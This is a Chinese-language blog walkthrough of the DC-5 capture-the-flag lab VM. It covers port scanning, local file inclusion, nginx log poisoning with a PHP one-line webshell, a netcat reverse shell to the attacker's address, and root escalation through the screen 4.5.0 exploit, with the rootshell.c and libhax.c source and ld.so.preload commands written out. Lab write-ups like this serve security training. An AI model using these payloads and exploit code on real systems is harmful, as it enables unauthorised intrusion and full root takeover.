当前位置:网站首页>DC-5靶机
DC-5靶机
2022-07-04 12:33:00 【m0_62094846】
ifconfig
查找主机IP
扫一波内网,探测下存活主机
nmap 192.168.61.0/24
使用nmap工具对DC-5靶机扫描开放的端口
nmap -A -T4 192.168.61.133 -p- -oN nmap133.A
(中途IP改成了192.168.61.134)
开放了80,111,39542

打开显示的IP地址

在concat界面把信息填写,就会跳转页面,是GET传参
反复刷新会发现时间有变化,猜测页面存在文件包含(?)
然后用burp爆破页面(御剑扫不出来)
一共7个

footer可以看到这个,确认这个是包含界面
使用BurpSuite爆破文件包含的变量名,及后台passwd文件存在位置
变量名:file,passwd文件位置:/etc/passwd

查看日志保存位置:
法一:
使用BurpSuite抓包爆破靶机日志文件的位置,爆破成功
/var/log/nginx/error.log
/var/log/nginx/access.log
法二:
file==/etc/nginx/nginx.conf
<?php system($_GET['test']);?>使用BurpSuite修改数据包数据,写入一句话木马,打开日志文件可以看到成功写入

使用一句话木马执行命令
/var/log/nginx/error.log&test=ls
在kali进行监听
netcat -l -p 4444file=/var/log/nginx/error.log&test=nc+192.168.61.129+4444+-e+/bin/bash
然后
python -c 'import pty;pty.spawn("/bin/sh")'
查找权限
(130条消息) find / -perm -4000 2>/dev/null的拆分讲解_Marx_Otto的博客-CSDN博客
find / -perm /4000 2>/dev/null简单来说:寻找 4000权限的文件,不显示其他的错误信息相当于过滤。

screen-4.5.0:命令行终端切换的软件,通过它同时连接几个本地或远程的命令行会话,可以作为一个提权的点
查看漏洞

把文件提取出来
cp /usr/share/exploitdb/exploits/linux/local/41154.sh screen_450.sh
cp /usr/share/exploitdb/exploits/linux/local/41152.sh screen_450.txt打开文件
cat screen_450.txt
cat screen_450.sh
根据提示把代码保存到/tmp下
分别保存为
rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}然后把rootshell.c编译成rootshell
gcc -o /tmp/rootshell /tmp/rootshell.c把libhax.c编译成libhax.so
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
先是libhax.so
在虚拟机
nc -lvvp 4444 < libhax.so在目标机
nc 192.168.61.129 4444 > libhax.so
然后在主机上ctrl+c终止
然后是rootshell
在虚拟机
nc -lvvp 4444 < rootshell在目标机
nc 192.168.61.129 4444 > rootshell在目标机上查看,可以看到传入成功

然后进行一系列的提权步骤
(之前漏洞信息里有步骤)

cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
然后就获得root权限了(whoami查看)
cd /root
ls
cat thisistheflag.txt

边栏推荐
- Fastlane 一键打包/发布APP - 使用记录及踩坑
- PKCs 5: password based cryptography specification version 2.1 Chinese Translation
- Clion configuration of opencv
- 2020 Summary - Magic year, magic me
- 8.8.1-PointersOnC-20220214
- In 2022, financial products are not guaranteed?
- [notes] in depth explanation of assets, resources and assetbundles
- [Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 16
- How do std:: function and function pointer assign values to each other
- Practical dry goods: deploy mini version message queue based on redis6.0
猜你喜欢
![Entitas learning [iv] other common knowledge points](/img/1c/f899f4600fef07ce39189e16afc44a.jpg)
Entitas learning [iv] other common knowledge points

SAP ui5 date type sap ui. model. type. Analysis of the display format of date

Wechat video Number launches "creator traffic package"

Reptile learning 4 winter vacation series (3)

OSI seven layer model & unit

Experiment 7. IPv6

Exness: positive I win, negative you lose

nn. Exploration and experiment of batchnorm2d principle

When synchronized encounters this thing, there is a big hole, pay attention!
![[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 24](/img/2e/b1f348ee6abaef24b439944acf36d8.jpg)
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 24
随机推荐
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 8
LVS load balancing cluster deployment - Dr direct routing mode
vim 出现 Another program may be editing the same file. If this is the case 的解决方法
Wechat video Number launches "creator traffic package"
Global and Chinese market of cardiac monitoring 2022-2028: Research Report on technology, participants, trends, market size and share
Detailed explanation of NPM installation and caching mechanism
Entity framework calls Max on null on records - Entity Framework calling Max on null on records
C language compilation process
Netgear switch basic configuration command set
Abnormal mode of ARM processor
C语言:求100-999是7的倍数的回文数
Iframe to only show a certain part of the page
Reptile learning 4 winter vacation series (3)
JD home programmers delete databases and run away. Talk about binlog, the killer of MySQL data backup
03_ Armv8 instruction set introduction load and store instructions
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 11
queue
Haproxy cluster
Unity performance optimization reading notes - Introduction (1)
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 24